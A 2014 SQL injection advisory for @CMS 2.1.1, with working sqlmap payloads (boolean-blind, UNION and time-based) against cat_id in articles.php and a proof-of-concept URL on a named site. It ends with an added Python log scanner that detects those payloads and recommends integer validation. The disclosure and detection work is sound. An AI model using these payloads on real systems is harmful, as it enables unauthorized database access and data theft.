# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit: http://host/articles.php?cat_id=[SQLI]
# PoC: http://carla-coluXmna.de/articles.php?cat_id=[SQLI]
--- "SQLi using sqlmap."---
Place: GET
Parameter: cat_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs
---
# Thanks
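
Added example, not part of the original advisory or of @CMS code: a log check for the three techniques sqlmap reported against cat_id on articles.php. It assumes cat_id is meant to be a plain integer and that the web server writes combined-format access logs; the log lines, addresses, rule patterns and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the advisory). The cat_id values
# reuse the payload shapes listed in the sqlmap output, URL-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Aug/2014:10:00:01 +0000] "GET /articles.php?cat_id=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Aug/2014:10:00:05 +0000] "GET /articles.php?cat_id=5%27%20AND%206158%3D6158%20AND%20%27SEMo%27%3D%27SEMo HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Aug/2014:10:00:06 +0000] "GET /articles.php?cat_id=5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 HTTP/1.1" 200 5300',
    '203.0.113.9 - - [22/Aug/2014:10:00:12 +0000] "GET /articles.php?cat_id=5%27%20AND%20SLEEP(5)%20AND%20%27XLrs%27%3D%27XLrs HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/Aug/2014:10:00:20 +0000] "GET /index.php?cat_id=5%27 HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Most specific rule first: a time-based payload also contains a boolean test.
RULES = [
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(?:and|or)\b\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
]

def classify(value):
    """Return None for a plain integer id, else a label for the injection style."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-numeric"  # still worth flagging: cat_id should only ever be digits

def scan(lines, script="articles.php", param="cat_id"):
    """Return (line_number, label, decoded_value) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.rsplit("/", 1)[-1] != script:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify(value)
            if label:
                findings.append((number, label, value))
    return findings

if __name__ == "__main__":
    for number, label, value in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {value!r}")
```

The integer check in classify() is also the input validation articles.php would need before cat_id reaches a query; the regex rules only add a label for triage.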